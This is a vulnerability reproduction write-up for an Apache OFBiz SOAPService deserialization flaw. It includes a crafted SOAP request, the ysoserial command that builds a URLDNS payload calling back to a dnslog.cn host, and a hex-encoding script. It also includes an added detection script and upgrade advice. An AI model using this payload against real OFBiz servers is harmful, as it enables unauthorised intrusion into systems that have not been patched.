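Introduction
Apache OFBiz is an e-commerce platform for building large and medium-sized enterprise-grade, multi-tier, distributed e-commerce applications that run across platforms, databases and application servers.
Affected versions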
apache:ofbiz: <17.12.06
Environment setup
docker run -d -p 811:8080 -p 8443:8443 opensourceknight/ofbiz

Vulnerability reproduction
Build the request
POST /webtools/control/SOAPService HTTP/1.1
Host: 192.168.204.131:811
Content-Length: 1023
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/xml
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-HashMap>
<map-Entry>
<map-Key><cus-obj>[hex string produced by the steps below]</cus-obj></map-Key>
<map-Value><std-String value="http://34fipn.dnslog.cn"/></map-Value>
</map-Entry>
</map-HashMap>
</ser>
</soapenv:Body>
</soapenv:Envelope>
The cus-obj value in the middle is generated directly with ysoserial:
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://34fipn.dnslog.cn >1.ot
Then convert the output to hex:
import binascii

filename = '1.ot'
# Read the serialized object written by ysoserial and print it as a hex string
with open(filename, 'rb') as f:
    content = f.read()
print(binascii.hexlify(content).decode())
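
On the detection side, the cus-obj value in this request is a hex-encoded Java serialization stream, so once decoded it starts with the stream magic bytes AC ED 00 05. The following is an added example, not code from the original post or from OFBiz: it inspects a captured raw HTTP request for that pattern on the SOAPService endpoint. The function name, the host name ofbiz.example and the sample requests are constructed for illustration.

```python
import re

SOAP_PATH = "/webtools/control/soapservice"  # endpoint from the request above, lowercased
JAVA_MAGIC = bytes.fromhex("aced0005")       # header of every Java serialization stream
CUS_OBJ = re.compile(rb"<cus-obj>(.*?)</cus-obj>", re.S)


def inspect_request(raw: bytes) -> list:
    """Return findings for one raw HTTP request (request line + headers + body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("latin-1").split(" ")
    if len(parts) < 2 or parts[0] != "POST" or SOAP_PATH not in parts[1].lower():
        return []
    findings = []
    for match in CUS_OBJ.finditer(body):
        # Drop whitespace so wrapped hex is still decoded
        hex_text = b"".join(match.group(1).split()).decode("latin-1")
        try:
            blob = bytes.fromhex(hex_text)
        except ValueError:
            findings.append("cus-obj is not valid hex")
            continue
        if blob.startswith(JAVA_MAGIC):
            findings.append(f"java-serialized cus-obj ({len(blob)} bytes)")
        else:
            findings.append("cus-obj hex without Java stream magic")
    return findings


def _request(path: str, body: bytes) -> bytes:
    head = f"POST {path} HTTP/1.1\r\nHost: ofbiz.example\r\nContent-Type: application/xml\r\n\r\n"
    return head.encode() + body


# Constructed samples: the stream magic followed by 8 zero bytes, not a working payload.
SAMPLE_SUSPICIOUS = _request(
    "/webtools/control/SOAPService",
    b"<map-Key><cus-obj>ACED0005" + b"00" * 8 + b"</cus-obj></map-Key>")
SAMPLE_BENIGN = _request(
    "/webtools/control/SOAPService",
    b'<map-Value><std-String value="ping"/></map-Value>')

if __name__ == "__main__":
    for name, req in [("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)]:
        print(name, inspect_request(req))
```

The same check can be applied to request bodies exported from a reverse proxy or WAF log, and any hit on an OFBiz instance older than 17.12.06 warrants investigation.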


Remediation
Upgrade to a fixed version:
https://ofbiz.apache.org/download.html#vulnerabilities
